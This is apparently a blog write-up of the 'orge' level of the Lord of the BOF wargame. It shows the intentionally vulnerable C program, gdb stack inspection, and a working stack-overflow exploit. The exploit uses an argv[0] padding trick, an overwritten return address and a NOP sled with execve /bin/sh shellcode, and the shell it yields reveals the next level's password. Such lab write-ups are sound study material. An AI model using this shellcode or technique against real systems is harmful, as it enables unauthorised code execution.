[lob] darkelf -> orge (category: 공부/LOB, posted 2014-07-30 20:04)
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Entry point of the "orge" level of The Lord of the BOF.
 *
 * This program is deliberately vulnerable: the unbounded strcpy() near the
 * end is the intended target of the level, and the checks in front of it only
 * constrain HOW the overflow can be used.  The frame layout must not be
 * changed -- the exploit in the accompanying transcript relies on it (its
 * payload is 44 bytes of padding followed by a 4-byte address).
 *
 * NOTE(review): strlen/strcpy/memset are used without <string.h>, and main
 * has no return type.  This only builds under the old compiler of the LOB
 * image (implicit int, implicit function declarations); it is not valid C99+.
 */
main(int argc, char *argv[])
{
char buffer[40];   /* 40-byte stack buffer: the overflow target */
int i;
/* at least one command-line argument is required */
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed! -- argv[0] (the pathname the binary was invoked with) must be
// exactly 77 bytes long; this is why the transcript runs the binary through a
// path padded with '/' characters
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter: overwrite every environment string with zeros, so a payload
// cannot be staged in an environment variable
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
/*
 * Byte 47 of argv[1] must be 0xbf.  In the transcript's payload, bytes 44..47
 * hold the 4-byte address written over the saved return address, so this
 * forces its most significant byte to 0xbf (every stack address shown in the
 * transcript starts with 0xbf).
 * NOTE(review): this index is read BEFORE the length check below, so an
 * argv[1] shorter than 48 bytes makes this an out-of-bounds read.
 */
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument: at most 48 bytes are accepted ...
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// ... but `buffer` holds only 40, so strcpy() writes up to 48 bytes plus the
// NUL terminator (49 bytes) into a 40-byte buffer: the intended overflow
strcpy(buffer, argv[1]);
/* echo the copied string (the transcript shows the 'a' padding here) */
printf("%s\n", buffer);
// buffer hunter: zero `buffer` before main returns, so the payload cannot be
// executed from `buffer` itself -- the shellcode has to live elsewhere
// (the transcript stages it in argv[2], padded with NOP bytes)
memset(buffer, 0, 40);
}
ltrace .///////////////////////////////////////////////////////////////////////////o `python -c'print "a"*44+"\x0f\xfc\xff\xbf"'` `python -c'print "\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
0xbffffb8b
0xbffffc50
Type "help" followed by a class name for a list of commands in that class.
Type "help" followed by command name for full documentation.
Command name abbreviations are allowed if unambiguous.
(gdb) x/x $ebp
0xbffffad8: 0x00000000
(gdb) x/x $ebp+0xc
0xbffffae4: 0x00000003
(gdb) x/x $ebp+0x10
0xbffffae8: 0xbffffb04
(gdb) x/x 0xbffffb04
0xbffffb04: 0xbffffbfc
(gdb) x/s 0xbffffbfc
0xbffffbfc: "/home/darkelf/.", '/' <repeats 61 times>, "o"
(gdb) x/x 0xbffffb08
0xbffffb08: 0xbffffc4a
(gdb) x/s 0xbffffc4a
0xbffffc4a: "1234"
(gdb) x/x 0xbffffb0b
0xbffffb0b: 0xfffc4fbf
(gdb) x/x 0xbffffb0c
0xbffffb0c: 0xbffffc4f
(gdb) x/s 0xbffffc4f
0xbffffc4f: "1234"
(gdb)
ltrace /home/darkelf/./////////////////////////////////////////////////////////////o `python -c'print "a"*44+"\x0d\xf4\xfe\xbf"'` `python -c'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
0xbffffbc3
0xbffffc52
0xbffffaec
[darkelf@localhost darkelf]$ .////////////////////////////////////////////////////////////////////////orge `python -c'print "a"*44+"\x0d\xf4\xfe\xbf"'` `python -c'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
梢aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
bash$ ls
ls: .: Permission denied
bash$ my-pass
euid = 507
timewalker
bash$